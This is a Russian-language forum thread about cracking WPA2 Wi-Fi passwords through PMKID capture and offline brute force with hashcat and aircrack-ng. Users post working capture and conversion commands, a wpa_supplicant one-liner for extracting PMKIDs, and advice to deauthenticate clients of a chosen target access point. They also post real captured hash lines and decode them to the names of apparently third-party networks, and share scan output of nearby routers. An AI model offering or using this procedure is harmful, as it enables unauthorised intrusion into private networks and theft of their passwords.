Брут WPA2 без handshake используя PMKID + hashcat

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Vikhedgehog, 6 Aug 2018.

  1. larinvlad

    larinvlad New Member

    Joined:
    20 Mar 2014
    Messages:
    30
    Likes Received:
    0
    Reputations:
    0
    Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?
    Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?

    В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.
     
    1. Mistral

      Mistral Elder - Старейшина

      Joined:
      30 Aug 2015
      Messages:
      2,906
      Likes Received:
      14,261
      Reputations:
      138
      https://forum.antichat.ru/threads/464369/page-2#post-4238069
       
      1. 4Fun

        4Fun Well-Known Member

        Joined:
        25 Jul 2018
        Messages:
        496
        Likes Received:
        708
        Reputations:
        11
        Вы получили строку с PMKID (требуется удалить пробелы). Вам нужно знать ESSID и BSSID точки доступа, а также MAC-адрес вашей беспроводной карты. Последний можно узнать командой:
        Code:
        iw dev
        Из BSSID, MAC удаляете разделители, а ESSID преобразовываете в HEX с помощью сервиса.
        Затем просто составляете строку формата:
        pmkid*bssid*mac*essid
        и записываете в файл с расширением .16800, который можно скормить Hashcat.
        WiFiPR: находите конструктор PMKID и заполняете поля этими данными.
         
        larinvlad likes this.
        1. bravephoenix748

          Joined:
          3 Jun 2018
          Messages:
          72
          Likes Received:
          21
          Reputations:
          1
          Если только в Wireless Password Recovery то проще с помощью конструктороа PMKID.
          https://www.passcape.com/wireless_password_recovery_pmkid_constructor_rus
          А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла
          AMAC это точка доступа ,а SMAC это ваш адаптер.Обратие внимание если у вас стоит в /etc/NetworkManager/conf.d/mac.conf
          как в Porteuse по умолчанию(клонирование мас)



          wifi.cloned-mac-address=stable то тот котрый был в момент подклбчения...
           
          #264 bravephoenix748, 11 Nov 2020
          Last edited: 11 Nov 2020
          larinvlad likes this.
          1. 4Fun

            4Fun Well-Known Member

            Joined:
            25 Jul 2018
            Messages:
            496
            Likes Received:
            708
            Reputations:
            11
            Важное замечание: в Aircrack-ng 1.6 добавлена возможность подавать PMKID как строку:
            Code:
            aircrack-ng -I "a33b5ba86374d241ab527a500124789b*c4c9ec10d0d2*acde489a876d*522d6c696e65" -w /path/to/dictionary
             
            Kevin Shindel likes this.
            1. erwerr2321

              erwerr2321 Elder - Старейшина

              Joined:
              19 Jun 2015
              Messages:
              4,233
              Likes Received:
              26,222
              Reputations:
              147
              @4Fun, прив!

              Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!?
              Не помешало бы его или ссылку на него добавить в шапку, да и твой тоже в соответствующей теме!
               
              1. 4Fun

                4Fun Well-Known Member

                Joined:
                25 Jul 2018
                Messages:
                496
                Likes Received:
                708
                Reputations:
                11
                Наработки в этом направлении есть, но полноценного списка нет. Собирал данные (BSSID, в первую очередь) с wpa-sec.stanev.org, с темы перебора на этом форуме. В планах насобирать большое количество различных BSSID и обобщить этот список в список шаблонов (можно сказать, регулярных выражений или масок).
                 
                1. Af5G4337

                  Af5G4337 Member

                  Joined:
                  17 Dec 2016
                  Messages:
                  94
                  Likes Received:
                  37
                  Reputations:
                  0
                  Всем доброго!
                  Пытаюсь проводить мероприятия в данном направлении. Поступаю так. Обычным аирслаксом сканирую сети, выбираю интересующую, включаю перехват и если клиентов нет, то просто пытаюсь подключиться с другого устройства. Потом смотрю акулой захваченный сар файл и всю необходимую инфу оттуда выцепляю. Заметил некоторую особенность, а именно:
                  1. некотрые точки легко отдают все, мне необходимые, данные включая рмк
                  2. некоторые вообще не отдают ни одного еапол пакета, хоть тресни.
                  3. некоторые отдают рмк с номером 0400000000000000.....
                  4. а вот некоторые, сперва молчат ка рыба об лед, а потом отдают валидный рмк но совсем не с первого, а с пятого - десятого подключения.
                  Четвертый пункт мне показался интересным, сразу скажу, что все происходит с нормальным или хорошим уровнем сигнала, дальнобоем вообще не интересуюсь.
                   
                  1. Absolum

                    Absolum Member

                    Joined:
                    28 Feb 2020
                    Messages:
                    64
                    Likes Received:
                    25
                    Reputations:
                    0
                    Ребят. в видеоролике на ютубе - на 23 мин 40 сек

                    PMKID атака | Новая техника не требующая клиентов на точке доступа | PMKID+Hashcat



                    (у него Kali линукс) , на такую комманду:

                    hcxpcaptool -i wlan0mon -о pmkid/capture.pcapng --enable status=15

                    У человечка выдаёт такое:

                    https://clip2net.com/s/4bbNOIp
                    https://clip2net.com/s/4bbNOYE



                    А у меня в Porteus линукс, который идёт с Airslax

                    Его комманда:

                    hcxpcaptool -i wlan0mon -о pmkid/capture.pcapng --enable status=15

                    у меня не запустилась, но запустилась такая комманда:

                    hcxdumptool -o test.pcapng -i wlan1mon --enable_status 15

                    почему у меня выдаёт другое ?

                    имею ввиду такие строки: (и так далее)

                    17:55:12 4 ffffffffffff b0dfc1e39821 Tenda_E39820 [BEACON]
                    17:55:20 6 ffffffffffff c4ad34753be8 MikroTik-753BE8 [BEACON]

                    Может мой адаптер (pci): Wireless D-Link DWL-G520

                    https://dlink.ru/ru/products/2/251.html

                    не умеет аппаратно pmkid или ещё что то нужно набрать в терминале ?




                    Вот мой полный текст из моего терминала:
                    root@WiFI-Villain:~# hcxdumptool -o test.pcapng -i wlan1mon --enable_status 15
                    initialization...
                    warning: wlan1mon is probably a virtual monitor interface and some attack modes may not work as expected
                    interface is already in monitor mode

                    start capturing (stop with ctrl+c)
                    NMEA 0183 SENTENCE........: N/A
                    INTERFACE NAME............: wlan1mon
                    INTERFACE PROTOCOL........: IEEE 802.11
                    INTERFACE HARDWARE MAC....: 0015e945f4a8
                    DRIVER....................: ath5k
                    DRIVER VERSION............: 4.14.0-porteus
                    DRIVER FIRMWARE VERSION...: N/A
                    openSSL version...........: 1.1
                    ERRORMAX..................: 100 errors
                    BPF code blocks...........: 0
                    FILTERLIST ACCESS POINT...: 0 entries
                    FILTERLIST CLIENT.........: 0 entries
                    FILTERMODE................: unused
                    WEAK CANDIDATE............: 12345678
                    ESSID list................: 0 entries
                    ACCESS POINT (ROGUE)......: 0050c7610345 (BROADCAST HIDDEN)
                    ACCESS POINT (ROGUE)......: 0050c7610346 (BROADCAST OPEN)
                    ACCESS POINT (ROGUE)......: 0050c7610347 (incremented on every new client)
                    CLIENT (ROGUE)............: b0ece1a25383
                    EAPOLTIMEOUT..............: 20000 usec
                    EAPOLEAPTIMEOUT...........: 2500000 usec
                    REPLAYCOUNT...............: 63496
                    ANONCE....................: 25096bf1d4b835378d4520ea635da21691758c21fa1dbc68e0f822c2d3a547bd
                    SNONCE....................: 6a2e6ca4943be2b80d2ff3c26fa0a7c71f7ce6e05930d34aad80e40520763bd8

                    17:55:03 1 ffffffffffff 28285dd5f6c8 Keenetic-8439 [BEACON]
                    17:55:03 1 ffffffffffff 50ff2003e98c Keenetic-9791 [BEACON]
                    17:55:04 2 ffffffffffff e4beed8a17a2 hello [BEACON]
                    17:55:07 2 ffffffffffff 50ff2043a646 Keenetic-1983 [BEACON]
                    17:55:12 4 ffffffffffff b0dfc1e39821 Tenda_E39820 [BEACON]
                    17:55:20 6 ffffffffffff c4ad34753be8 MikroTik-753BE8 [BEACON]
                    17:55:22 6 ffffffffffff 84c9b249b187 dlink [BEACON]
                    17:55:28 8 ffffffffffff 647002cd7418 TP-LINK_CD7418 [BEACON]
                    17:55:29 8 ffffffffffff 52ff2045e557 [HIDDEN BEACON]
                    17:55:30 8 ffffffffffff 50ff2045e557 Keenetic-3662 [BEACON]
                    17:55:36 10 ffffffffffff 74da881116a4 Pain inc. [BEACON]
                    17:55:36 10 ffffffffffff cc32e570973d TP-Link_973D [BEACON]
                    17:55:40 11 ffffffffffff c471540d26f2 TP-LINK_26F2 [BEACON]
                    17:55:40 11 ffffffffffff 2c56dccff840 ASUS 99 [BEACON]
                    17:55:40 11 ffffffffffff bcf6853c74f2 DIR-300NRUB6 [BEACON]
                    17:55:42 11 ffffffffffff 8a7b5bd936c3 Nataly [BEACON]
                    17:55:56 1 ffffffffffff 386b1ca432d6 MERCUSYS_32D6 [BEACON]
                    17:55:56 1 ffffffffffff ee43f6d60020 armkart [BEACON]
                    17:56:19 6 ffffffffffff 1e5bb3041694 AndroidAP3A19 [BEACON]
                    17:56:24 8 ffffffffffff 50ff201ae7e0 Keenetic-7701 [BEACON]
                    17:56:26 8 ffffffffffff 52ff204ae7e0 [HIDDEN BEACON]
                     
                    1. Absolum

                      Absolum Member

                      Joined:
                      28 Feb 2020
                      Messages:
                      64
                      Likes Received:
                      25
                      Reputations:
                      0
                      Наверное тут на форуме было это уже много раз тут. Но я лично не читал пока что про прогу CommView

                      В ролике довольно быстро и просто вроде бы поймал - Pmkid:

                      Конектился к wi-fi точке - с Любым паролем

                      Extract PMKID On Windows Using CommView To Be Used On HashCat - YouTube

                       
                      #270 Absolum, 5 Mar 2021
                      Last edited: 5 Mar 2021
                      1. Alexmeh

                        Alexmeh Elder - Старейшина

                        Joined:
                        19 Nov 2015
                        Messages:
                        2,344
                        Likes Received:
                        20,037
                        Reputations:
                        96
                        Получилось?
                        CommView - отстой!!!
                         
                        binarymaster and Spinus like this.
                        1. Absolum

                          Absolum Member

                          Joined:
                          28 Feb 2020
                          Messages:
                          64
                          Likes Received:
                          25
                          Reputations:
                          0
                          он в ролике коннектился с Произвольным паролем. У него вроде получилось. посмотрите ролик
                           
                          1. erwerr2321

                            erwerr2321 Elder - Старейшина

                            Joined:
                            19 Jun 2015
                            Messages:
                            4,233
                            Likes Received:
                            26,222
                            Reputations:
                            147
                            Использовать это поделие и тем более рекомендовать его кому-либо, тут считается моветоном!
                             
                            binarymaster and Spinus like this.
                            1. Absolum

                              Absolum Member

                              Joined:
                              28 Feb 2020
                              Messages:
                              64
                              Likes Received:
                              25
                              Reputations:
                              0
                              а ты не знаешь, что делать с этим Key , который мне выдала прога (или роутер ? ) на вкладке Other в WifiSlax 4.12 в программе WifiMetrropolis 3 ?

                              это вообще что за аттака ? по wps ?

                              попробовал с этим кеем приконнектиться к wi-fi - Tenda_E39820 - не коннектиться.

                              потом попробовал его ввести как wps ключ и потом скан по wps через Reaver (в Airslax 5.14 pro) - но тишина.

                              https://clip2net.com/s/4bd9hR8
                               
                              1. dart8888

                                dart8888 Member

                                Joined:
                                1 Feb 2020
                                Messages:
                                249
                                Likes Received:
                                65
                                Reputations:
                                0
                                да странно что в терминале часто при поимке хш вылазит типа "обнаружен мпкид" - по сути то одно и тоже? но отдельно не записывает (( печалька.
                                 
                                1. bravephoenix748

                                  Joined:
                                  3 Jun 2018
                                  Messages:
                                  72
                                  Likes Received:
                                  21
                                  Reputations:
                                  1
                                  [​IMG]

                                  Я начинаю ловить PMKID cначала WifiMetropolis тк сразу получается PMKID в формате cap и его можно вставить сразу в WPR не извлекая вручную.Также сразу можно проверить на валидность пойманный PMKID нажав кнопку Aircrack-ng -там сразу видно валидный он или нет.
                                  Короче очень быстро ловится или если не ловится то понимаешь что он вообще не поймается тк нет клиентов.Тогда переходите к способу

                                  wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1

                                  Короче как выбрали целевую точку при сканировании- есть клиенты или нет сразу глушите точку- нажимайте кнопку DesAutenticacion(которая крайне правая и красная)
                                  Если клент есть он появится через 5-10 сек.Если нет то он и не появится.Наверное aircrack-ng скачет по каналам и не всегда видит клиентов.А тут когда сканируете на отельном канале то они появляются бытро.Если есть клиенты то нажимайте DesAutenticacion(левая чёрная)
                                  Естественно aircrack-ng 1.6 должен быть установлен.Кстати пользуюсь Wifislax 4.12 XFCE поздние версии KDE а это вроде зло:)

                                  [​IMG]
                                  Кстати разработчики Kali наконец-то:D по умолчанию ставаят самое нормальное окружение XFCE
                                   
                                  #276 bravephoenix748, 30 May 2021
                                  Last edited: 30 May 2021
                                  1. Kevin Shindel

                                    Kevin Shindel Elder - Старейшина

                                    Joined:
                                    24 May 2015
                                    Messages:
                                    1,014
                                    Likes Received:
                                    1,200
                                    Reputations:
                                    62
                                    Ребята помогите распарсить файлик.
                                    Запустил так ...
                                    Code:
                                    hcxdumptool -i wlan0 --disable_disassociations -o test.pcapng --enable_status=15
                                    потом сконвертил в новый формат.
                                    Code:
                                    hcxpcapngtool -o test.22000 test.pcapng
                                    на выходе файлик test.22000, содержание вида:

                                    Code:
                                    WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530*4ac1b5a688571792942695c66f672a836534df844ced1f8c30b926aaff75a233*0103007502010a00000000000000000002a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3edbac79a7786c931000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*02
                                    WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ecae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212809c9929a40a94cfe6fe8161d101a42e4030563*0103007502010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c81964faa7f44076fc40150affcb58b5ba3bbfb3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*02
                                    WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ecae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02030a001000000000000000027f0a607246336a6fe230e192fef5876b835b07dba5572c7760baf54993a685010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000*05
                                    Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей.
                                    Как определить какая из них какая ?
                                     
                                    1. antis17

                                      antis17 Well-Known Member

                                      Joined:
                                      25 Apr 2017
                                      Messages:
                                      158
                                      Likes Received:
                                      1,231
                                      Reputations:
                                      5
                                      HEX > ASCII
                                      554b7274656c65636f6d5f463838453530 - UKrtelecom_F88E50
                                      56696b61 - Vika
                                       
                                      Triton_Mgn, Kevin Shindel and user100 like this.
                                      1. Kevin Shindel

                                        Kevin Shindel Elder - Старейшина

                                        Joined:
                                        24 May 2015
                                        Messages:
                                        1,014
                                        Likes Received:
                                        1,200
                                        Reputations:
                                        62
                                        Тут получаются разные хэши изза того что разные маки использовались для конекшена... уже понял.

                                        Code:
                                        WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ecae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212809c9929a40a94cfe6fe8161d101a42e4030563*0103007502010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c81964faa7f44076fc40150affcb58b5ba3bbfb3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*02
                                        WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ecae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02030a001000000000000000027f0a607246336a6fe230e192fef5876b835b07dba5572c7760baf54993a685010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000*05
                                        Спасибо большое!
                                         
                                        1. Kevin Shindel

                                          Kevin Shindel Elder - Старейшина

                                          Joined:
                                          24 May 2015
                                          Messages:
                                          1,014
                                          Likes Received:
                                          1,200
                                          Reputations:
                                          62
                                          Еще вопрос как запустить софтину на 5 герцах?
                                          Указывать каналы через запятую как то не очень...
                                           
                                          Loading...